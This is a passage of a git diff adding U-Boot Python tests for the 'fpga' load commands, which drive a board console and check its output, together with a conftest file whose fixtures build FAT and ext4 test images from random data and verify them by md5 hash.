'bitstream_loadb') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadb %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadbp') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadbp(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_loadb') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadb %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + + # And load also partial bistream in bit format + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_loadbp') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadbp %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +###### FPGA LOADMK tests ###### + 
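+# The loadmk tests below do not build their own images; the mkimage-wrapped
+# bitstreams named in env__fpga_under_test ('mkimage_legacy',
+# 'mkimage_legacy_gz', 'mkimage_fit') must already exist on the TFTP server.
+# As a rough illustration only (image type, arch and file names are
+# assumptions, not something these tests enforce), such images could be
+# produced on the host with:
+#   mkimage -A arm -T firmware -C none -d compress.bin download.ub
+#   gzip -k compress.bin
+#   mkimage -A arm -T firmware -C gzip -d compress.bin.gz download.gz.ub
+#   mkimage -f download-fit.its download-fit.ub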
+@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_fail(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + # load image but pass incorrect address to show error message + expected = 'Unknown image type' + output = ubman.run_command('fpga loadmk %x %x' % (dev, addr + 0x10)) + assert expected in output + + # Pass more parameters then command expects - 0 at the end + output = ubman.run_command('fpga loadmk %x %x 0' % (dev, addr)) + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_legacy(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x %x && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.xfail +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_legacy_variable_fpga(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + ubman.run_command('setenv fpga %x' % (dev)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x && echo %s' % (addr, expected_text)) + ubman.run_command('setenv fpga') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_legacy_variable_fpgadata(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + ubman.run_command('setenv fpgadata %x' % (addr)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x && echo %s' % (dev, expected_text)) + ubman.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_legacy_variable(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + ubman.run_command('setenv fpga %x' % (dev)) + ubman.run_command('setenv fpgadata %x' % (addr)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk && echo %s' % (expected_text)) + ubman.run_command('setenv fpga') + ubman.run_command('setenv fpgadata') + assert expected_text in output + 
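+# The *_variable tests above exercise the fallback in cmd/fpga.c: when
+# arguments are omitted, the device number is taken from the 'fpga'
+# environment variable and the data address from 'fpgadata', so the shortest
+# working invocation is simply:
+#   setenv fpga 0
+#   setenv fpgadata <data_addr>
+#   fpga loadmk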
+@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +@pytest.mark.buildconfigspec('gzip') +def test_fpga_loadmk_legacy_gz(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy_gz') + + ubman.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x %x && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_external(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit_external') + + ubman.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x %x:fpga && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit') + + ubman.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x %x:fpga && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable_fpga(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit') + + ubman.run_command('imi %x' % (addr)) + # FIXME this should fail - broken support in past + ubman.run_command('setenv fpga %x' % (dev)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x:fpga && echo %s' % (addr, expected_text)) + ubman.run_command('setenv fpga') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable_fpgadata(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit') + + ubman.run_command('imi %x' % (addr)) + # FIXME this should fail - broken support in past + ubman.run_command('setenv fpgadata %x:fpga' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x && echo %s' % (dev, expected_text)) + ubman.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_fit') + + ubman.run_command('imi %x' % (addr)) + + ubman.run_command('setenv fpga %x' % (dev)) + ubman.run_command('setenv fpgadata %x:fpga' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk && echo %s' % (expected_text)) + ubman.run_command('setenv fpga') + ubman.run_command('setenv fpgadata') + assert expected_text in output + +###### FPGA LOAD tests ###### + 
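+# These tests cover 'fpga loadfs', which reads the bitstream from a
+# filesystem rather than from a buffer that was loaded beforehand. The long
+# form used below is:
+#   fpga loadfs <dev> <data_addr> <size> <blocksize> <interface> <dev[:part]> <file>
+# which, with the sample env__fpga_under_test values documented at the top of
+# this file, expands to roughly:
+#   fpga loadfs 0 1000000 1bf418 10000 mmc 0 compress.bin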
+@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_loadfs_fail(ubman): + dev, f = check_dev(ubman) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + bit = f['loadfs'] + bit_size = f['loadfs_size'] + block_size = f['loadfs_block_size'] + + # less params - dev number removed + expected = 'fpga: incorrect parameters passed' + output = ubman.run_command('fpga loadfs %x %x %x %s' % (addr, bit_size, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # one more param - 0 at the end + # This is the longest command that's why there is no message from cmd/fpga.c + output = ubman.run_command('fpga loadfs %x %x %x %x %s 0' % (dev, addr, bit_size, block_size, bit)) + assert expected_usage in output + + # zero address 0 + expected = 'fpga: zero fpga_data address' + output = ubman.run_command('fpga loadfs %x %x %x %x %s' % (dev, 0, bit_size, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # bit_size 0 + expected = 'fpga: zero size' + output = ubman.run_command('fpga loadfs %x %x %x %x %s' % (dev, addr, 0, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # block size 0 + # FIXME this should pass but it failing too + output = ubman.run_command('fpga loadfs %x %x %x %x %s' % (dev, addr, bit_size, 0, bit)) + assert expected_usage in output + + # non existing bitstream name + expected = 'Unable to read file noname' + output = ubman.run_command('fpga loadfs %x %x %x %x mmc 0 noname' % (dev, addr, bit_size, block_size)) + assert expected in output + assert expected_usage in output + + # -1 dev number + expected = 'fpga_fsload: Invalid device number -1' + output = ubman.run_command('fpga loadfs %d %x %x %x mmc 0 noname' % (-1, addr, bit_size, block_size)) + assert expected in output + assert expected_usage in output + + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadfs(ubman): + dev, f = check_dev(ubman) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + bit = f['loadfs'] + bit_size = f['loadfs_size'] + block_size = f['loadfs_block_size'] + + # This should be done better + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadfs %x %x %x %x %s && echo %s' % (dev, addr, bit_size, block_size, bit, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_load_secure') +@pytest.mark.buildconfigspec('cmd_net') +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('net') +def test_fpga_secure_bit_auth(ubman): + + test_net.test_net_dhcp(ubman) + test_net.test_net_setup_static(ubman) + + f = ubman.config.env.get('env__fpga_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + expected_zynqmpsecure = 'Bitstream successfully loaded' + output = ubman.run_command('fpga loads 0 %x $filesize 0 2' % (addr)) + assert expected_zynqmpsecure in output + + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_load_secure') +@pytest.mark.buildconfigspec('cmd_net') +@pytest.mark.buildconfigspec('cmd_dhcp') 
+@pytest.mark.buildconfigspec('net') +def test_fpga_secure_bit_img_auth_kup(ubman): + + test_net.test_net_dhcp(ubman) + test_net.test_net_setup_static(ubman) + + f = ubman.config.env.get('env__fpga_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + keyaddr = f.get('keyaddr', None) + if not keyaddr: + addr = utils.find_ram_base(ubman) + expected_tftp = 'Bytes transferred = ' + keyfn = f['keyfn'] + output = ubman.run_command('tftpboot %x %s' % (keyaddr, keyfn)) + assert expected_tftp in output + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + expected_tftp = 'Bytes transferred = ' + fn = f['enckupfn'] + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + expected_zynqmpsecure = 'Bitstream successfully loaded' + output = ubman.run_command('fpga loads 0 %x $filesize 0 1 %x' % (addr, keyaddr)) + assert expected_zynqmpsecure in output diff --git a/test/py/tests/test_fs/conftest.py b/test/py/tests/test_fs/conftest.py new file mode 100644 index 00000000000..47a584ffe7c --- /dev/null +++ b/test/py/tests/test_fs/conftest.py @@ -0,0 +1,689 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> + +import os +import os.path +import pytest +import re +from subprocess import call, check_call, check_output, CalledProcessError +from fstest_defs import * +# pylint: disable=E0611 +from tests import fs_helper + +supported_fs_basic = ['fat16', 'fat32', 'ext4'] +supported_fs_ext = ['fat12', 'fat16', 'fat32'] +supported_fs_fat = ['fat12', 'fat16'] +supported_fs_mkdir = ['fat12', 'fat16', 'fat32'] +supported_fs_unlink = ['fat12', 'fat16', 'fat32'] +supported_fs_symlink = ['ext4'] +supported_fs_rename = ['fat12', 'fat16', 'fat32'] + +# +# Filesystem test specific setup +# +def pytest_addoption(parser): + """Enable --fs-type option. + + See pytest_configure() about how it works. + + Args: + parser: Pytest command-line parser. + + Returns: + Nothing. + """ + parser.addoption('--fs-type', action='append', default=None, + help='Targeting Filesystem Types') + +def pytest_configure(config): + """Restrict a file system(s) to be tested. + + A file system explicitly named with --fs-type option is selected + if it belongs to a default supported_fs_xxx list. + Multiple options can be specified. + + Args: + config: Pytest configuration. + + Returns: + Nothing. + """ + global supported_fs_basic + global supported_fs_ext + global supported_fs_fat + global supported_fs_mkdir + global supported_fs_unlink + global supported_fs_symlink + global supported_fs_rename + + def intersect(listA, listB): + return [x for x in listA if x in listB] + + supported_fs = config.getoption('fs_type') + if supported_fs: + print('*** FS TYPE modified: %s' % supported_fs) + supported_fs_basic = intersect(supported_fs, supported_fs_basic) + supported_fs_ext = intersect(supported_fs, supported_fs_ext) + supported_fs_fat = intersect(supported_fs, supported_fs_fat) + supported_fs_mkdir = intersect(supported_fs, supported_fs_mkdir) + supported_fs_unlink = intersect(supported_fs, supported_fs_unlink) + supported_fs_symlink = intersect(supported_fs, supported_fs_symlink) + supported_fs_rename = intersect(supported_fs, supported_fs_rename) + +def pytest_generate_tests(metafunc): + """Parametrize fixtures, fs_obj_xxx + + Each fixture will be parametrized with a corresponding support_fs_xxx + list. + + Args: + metafunc: Pytest test function. + + Returns: + Nothing. 
+ """ + if 'fs_obj_basic' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_basic', supported_fs_basic, + indirect=True, scope='module') + if 'fs_obj_ext' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_ext', supported_fs_ext, + indirect=True, scope='module') + if 'fs_obj_fat' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_fat', supported_fs_fat, + indirect=True, scope='module') + if 'fs_obj_mkdir' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_mkdir', supported_fs_mkdir, + indirect=True, scope='module') + if 'fs_obj_unlink' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_unlink', supported_fs_unlink, + indirect=True, scope='module') + if 'fs_obj_symlink' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_symlink', supported_fs_symlink, + indirect=True, scope='module') + if 'fs_obj_rename' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_rename', supported_fs_rename, + indirect=True, scope='module') + +# +# Helper functions +# +def fstype_to_ubname(fs_type): + """Convert a file system type to an U-Boot specific string + + A generated string can be used as part of file system related commands + or a config name in u-boot. Currently fat16 and fat32 are handled + specifically. + + Args: + fs_type: File system type. + + Return: + A corresponding string for file system type. + """ + if re.match('fat', fs_type): + return 'fat' + else: + return fs_type + +def check_ubconfig(config, fs_type): + """Check whether a file system is enabled in u-boot configuration. + + This function is assumed to be called in a fixture function so that + the whole test cases will be skipped if a given file system is not + enabled. + + Args: + fs_type: File system type. + + Return: + Nothing. + """ + if not config.buildconfig.get('config_cmd_%s' % fs_type, None): + pytest.skip('.config feature "CMD_%s" not enabled' % fs_type.upper()) + if not config.buildconfig.get('config_%s_write' % fs_type, None): + pytest.skip('.config feature "%s_WRITE" not enabled' + % fs_type.upper()) + +# from test/py/conftest.py +def tool_is_in_path(tool): + """Check whether a given command is available on host. + + Args: + tool: Command name. + + Return: + True if available, False if not. + """ + for path in os.environ['PATH'].split(os.pathsep): + fn = os.path.join(path, tool) + if os.path.isfile(fn) and os.access(fn, os.X_OK): + return True + return False + +# +# Fixture for basic fs test +# derived from test/fs/fs-test.sh +# +@pytest.fixture() +def fs_obj_basic(request, u_boot_config): + """Set up a file system to be used in basic fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for basic fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + scratch_dir = u_boot_config.persistent_data_dir + '/scratch' + + small_file = scratch_dir + '/' + SMALL_FILE + big_file = scratch_dir + '/' + BIG_FILE + + try: + check_call('mkdir -p %s' % scratch_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a subdirectory. + check_call('mkdir %s/SUBDIR' % scratch_dir, shell=True) + + # Create big file in this image. 
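+ # Because dd is used with 'seek=', the 2.5GB file is sparse: only the
+ # regions written below occupy real disk space on the build host.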
+ # Note that we work only on the start 1MB, couple MBs in the 2GB range + # and the last 1 MB of the huge 2.5GB file. + # So, just put random values only in those areas. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % big_file, shell=True) + check_call('dd if=/dev/urandom of=%s bs=1M count=2 seek=2047' + % big_file, shell=True) + check_call('dd if=/dev/urandom of=%s bs=1M count=1 seek=2499' + % big_file, shell=True) + + # Create a small file in this image. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % small_file, shell=True) + + # Delete the small file copies which possibly are written as part of a + # previous test. + # check_call('rm -f "%s.w"' % MB1, shell=True) + # check_call('rm -f "%s.w2"' % MB1, shell=True) + + # Generate the md5sums of reads that we will test against small file + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % small_file, shell=True).decode() + md5val = [ out.split()[0] ] + + # Generate the md5sums of reads that we will test against big file + # One from beginning of file. + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from end of file. + out = check_output( + 'dd if=%s bs=1M skip=2499 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from the last 1MB chunk of 2GB + out = check_output( + 'dd if=%s bs=1M skip=2047 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from the start 1MB chunk from 2GB + out = check_output( + 'dd if=%s bs=1M skip=2048 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One 1MB chunk crossing the 2GB boundary + out = check_output( + 'dd if=%s bs=512K skip=4095 count=2 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + try: + # 3GiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0xc0000000, '3GB', scratch_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + except CalledProcessError as err: + pytest.skip('Setup failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + else: + yield [fs_ubtype, fs_img, md5val] + finally: + call('rm -rf %s' % scratch_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for extended fs test +# +@pytest.fixture() +def fs_obj_ext(request, u_boot_config): + """Set up a file system to be used in extended fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for extended fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + scratch_dir = u_boot_config.persistent_data_dir + '/scratch' + + min_file = scratch_dir + '/' + MIN_FILE + tmp_file = scratch_dir + '/tmpfile' + + try: + check_call('mkdir -p %s' % scratch_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. 
{}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a test directory + check_call('mkdir %s/dir1' % scratch_dir, shell=True) + + # Create a small file and calculate md5 + check_call('dd if=/dev/urandom of=%s bs=1K count=20' + % min_file, shell=True) + out = check_output( + 'dd if=%s bs=1K 2> /dev/null | md5sum' + % min_file, shell=True).decode() + md5val = [ out.split()[0] ] + + # Calculate md5sum of Test Case 4 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=5 count=20' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + # Calculate md5sum of Test Case 5 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=5 count=5' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + # Calculate md5sum of Test Case 7 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=20 count=20' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + check_call('rm %s' % tmp_file, shell=True) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB', scratch_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img, md5val] + finally: + call('rm -rf %s' % scratch_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for mkdir test +# +@pytest.fixture() +def fs_obj_mkdir(request, u_boot_config): + """Set up a file system to be used in mkdir test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for mkdir test, i.e. a duplet of file system type and + volume file name. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB', None) + except: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for unlink test +# +@pytest.fixture() +def fs_obj_unlink(request, u_boot_config): + """Set up a file system to be used in unlink test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for unlink test, i.e. a duplet of file system type and + volume file name. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + scratch_dir = u_boot_config.persistent_data_dir + '/scratch' + + try: + check_call('mkdir -p %s' % scratch_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. 
{}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Test Case 1 & 3 + check_call('mkdir %s/dir1' % scratch_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir1/file1 bs=1K count=1' + % scratch_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir1/file2 bs=1K count=1' + % scratch_dir, shell=True) + + # Test Case 2 + check_call('mkdir %s/dir2' % scratch_dir, shell=True) + for i in range(0, 20): + check_call('mkdir %s/dir2/0123456789abcdef%02x' + % (scratch_dir, i), shell=True) + + # Test Case 4 + check_call('mkdir %s/dir4' % scratch_dir, shell=True) + + # Test Case 5, 6 & 7 + check_call('mkdir %s/dir5' % scratch_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir5/file1 bs=1K count=1' + % scratch_dir, shell=True) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB', scratch_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + finally: + call('rm -rf %s' % scratch_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for symlink fs test +# +@pytest.fixture() +def fs_obj_symlink(request, u_boot_config): + """Set up a file system to be used in symlink fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for basic fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + scratch_dir = u_boot_config.persistent_data_dir + '/scratch' + + small_file = scratch_dir + '/' + SMALL_FILE + medium_file = scratch_dir + '/' + MEDIUM_FILE + + try: + check_call('mkdir -p %s' % scratch_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a subdirectory. + check_call('mkdir %s/SUBDIR' % scratch_dir, shell=True) + + # Create a small file in this image. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % small_file, shell=True) + + # Create a medium file in this image. + check_call('dd if=/dev/urandom of=%s bs=10M count=1' + % medium_file, shell=True) + + # Generate the md5sums of reads that we will test against small file + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % small_file, shell=True).decode() + md5val = [out.split()[0]] + out = check_output( + 'dd if=%s bs=10M skip=0 count=1 2> /dev/null | md5sum' + % medium_file, shell=True).decode() + md5val.extend([out.split()[0]]) + + try: + # 1GiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x40000000, '1GB', scratch_dir) + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img, md5val] + finally: + call('rm -rf %s' % scratch_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for rename test +# +@pytest.fixture() +def fs_obj_rename(request, u_boot_config): + """Set up a file system to be used in rename tests. + + Args: + request: Pytest request object. 
+ u_boot_config: U-Boot configuration. + + Return: + A fixture for rename tests, i.e. a triplet of file system type, + volume file name, and dictionary of test identifier and md5val. + """ + def new_rand_file(path): + check_call('dd if=/dev/urandom of=%s bs=1K count=1' % path, shell=True) + + def file_hash(path): + out = check_output( + 'dd if=%s bs=1K skip=0 count=1 2> /dev/null | md5sum' % path, + shell=True + ) + return out.decode().split()[0] + + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/scratch' + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + md5val = {} + # Test Case 1 + check_call('mkdir %s/test1' % mount_dir, shell=True) + new_rand_file('%s/test1/file1' % mount_dir) + md5val['test1'] = file_hash('%s/test1/file1' % mount_dir) + + # Test Case 2 + check_call('mkdir %s/test2' % mount_dir, shell=True) + new_rand_file('%s/test2/file1' % mount_dir) + new_rand_file('%s/test2/file_exist' % mount_dir) + md5val['test2'] = file_hash('%s/test2/file1' % mount_dir) + + # Test Case 3 + check_call('mkdir -p %s/test3/dir1' % mount_dir, shell=True) + new_rand_file('%s/test3/dir1/file1' % mount_dir) + md5val['test3'] = file_hash('%s/test3/dir1/file1' % mount_dir) + + # Test Case 4 + check_call('mkdir -p %s/test4/dir1' % mount_dir, shell=True) + check_call('mkdir -p %s/test4/dir2/dir1' % mount_dir, shell=True) + new_rand_file('%s/test4/dir1/file1' % mount_dir) + md5val['test4'] = file_hash('%s/test4/dir1/file1' % mount_dir) + + # Test Case 5 + check_call('mkdir -p %s/test5/dir1' % mount_dir, shell=True) + new_rand_file('%s/test5/file2' % mount_dir) + md5val['test5'] = file_hash('%s/test5/file2' % mount_dir) + + # Test Case 6 + check_call('mkdir -p 